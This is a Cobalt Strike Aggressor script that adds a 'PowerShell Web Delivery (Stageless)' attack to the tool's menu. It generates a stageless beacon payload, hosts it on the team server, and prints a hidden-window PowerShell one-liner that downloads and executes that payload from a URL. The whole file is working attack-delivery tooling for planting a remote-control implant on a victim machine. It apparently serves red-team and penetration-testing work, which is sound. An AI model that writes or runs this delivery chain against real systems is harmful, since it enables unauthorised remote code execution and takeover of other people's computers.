A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)

stagelessweb.cna

# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.
	$arch = iff(%options["x64"] eq "true", "x64", "x86");

	# generate our stageless PowerShell script. We're going to make *this* function
	# the callback for this call. That's why we yield after.
	artifact_stageless(%options["listener"], "powershell", $arch, $null, $this);
	yield;

	# this function is now resumed after &artifact_stageless finished. $1 is our script.
	$script = $1;

	# host the script!
	$url = site_host(%options["host"], %options["port"], %options["uri"], $script, "text/plain", "Scripted Web Delivery (powershell)"); 

	# tell the user our URL
	prompt_text("One-liner: ", "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('" . $url . "'))\"", {});
}

# create a popup menu!
popup attacks {
	item "PowerShell Web Delivery (S)" {
		local('$dialog %defaults');

		# setup our defaults
		%defaults["uri"]  = "/a";
		%defaults["host"] = localip();
		%defaults["port"] = 80;

		# create our dialog
		$dialog = dialog("PowerShell Web Delivery (Stageless)", %defaults, &setup_attack);
		dialog_description($dialog, "A stageless version of the PowerShell Web Delivery attack.");
		drow_text($dialog, "uri", "URI Path: ", 20);
		drow_text($dialog, "host", "Local Host: ");
		drow_text($dialog, "port", "Local Port: ");
		drow_listener_stage($dialog, "listener", "Listener: "); # can't gen stageless payloads for other team servers.
		drow_checkbox($dialog, "x64", "x64: ", "Use x64 payload");
		dbutton_action($dialog, "Launch");

		# show our dialog
		dialog_show($dialog);
	}
}